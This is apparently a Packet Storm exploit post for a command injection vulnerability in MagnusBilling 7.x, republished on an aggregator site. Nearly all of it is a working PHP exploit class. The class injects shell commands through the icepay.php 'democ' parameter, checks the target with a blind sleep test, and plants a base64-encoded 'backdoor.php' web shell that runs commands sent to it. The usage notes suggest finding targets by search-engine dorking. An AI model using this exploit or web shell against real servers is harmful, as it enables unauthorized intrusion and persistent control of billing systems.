MagnusBilling 7.x Command Injection
2024-10-14 21:15:45 Author: packetstormsecurity.com(查看原文) 阅读量:1 收藏

=============================================================================================================================================
| # Title : MagnusBilling 7.x Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.magnusbilling.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 83 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] PayLoad :

<?php

class MagnusBillingExploit {
private $targetUri;
private $webShellName;

public function __construct($targetUri) {
$this->targetUri = $targetUri;
}

// Function to execute commands on the target
public function executeCommand($cmd) {
$url = $this->targetUri . '/lib/icepay/icepay.php?democ=/dev/null;' . $cmd . ';#';
return file_get_contents($url); // Send HTTP request
}

// Function to execute PHP code on the target
public function executePhp($cmd) {
$payload = base64_encode($cmd);
$url = $this->targetUri . '/lib/icepay/' . $this->webShellName;
$postFields = [$this->postParam => $payload];
return $this->sendPostRequest($url, $postFields); // Send POST request
}

// Upload backdoor webshell to the target
public function uploadBackdoorWebShell() {
// Name of the webshell to be uploaded
$this->webShellName = "backdoor.php"; // Set a specific name for the backdoor file

// Backdoor PHP code (this allows execution of commands passed through a GET parameter 'cmd')
$backdoorCode = "<?php if(isset(\$_GET['cmd'])){system(\$_GET['cmd']);} ?>";

// Encode the webshell content
$encodedPayload = base64_encode($backdoorCode);

// Construct the command to upload the backdoor
$cmd = "echo {$encodedPayload} | base64 -d > ./{$this->webShellName}";

// Execute the command to upload the backdoor
return $this->executeCommand($cmd);
}

// Check if the target can be exploited
public function check() {
$url = $this->targetUri;
$response = file_get_contents($url);
if (!$response || !preg_match('/MagnusBilling/i', $response)) {
return "Safe: Likely not a MagnusBilling application.";
}

$sleepTime = rand(4, 8);
$this->executeCommand("sleep {$sleepTime}");
sleep($sleepTime); // Simulate blind command injection

return "Vulnerable: Command injection successful.";
}

// Main function to exploit the target
public function exploit() {
echo "Uploading backdoor...\n";
$result = $this->uploadBackdoorWebShell();
if (!$result) {
die("Backdoor upload failed.");
}
echo "Backdoor uploaded at: {$this->targetUri}/lib/icepay/{$this->webShellName}\n";
}

// Helper function to send POST requests
private function sendPostRequest($url, $postFields) {
$options = [
'http' => [
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => http_build_query($postFields)
]
];
$context = stream_context_create($options);
return file_get_contents($url, false, $context);
}
}

// Usage example
$exploit = new MagnusBillingExploit('http://target-url/mbilling');
$exploit->exploit();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================


文章来源: https://packetstormsecurity.com/files/182167/magnusbilling7x-exec.txt
如有侵权请联系:admin#unsafe.sh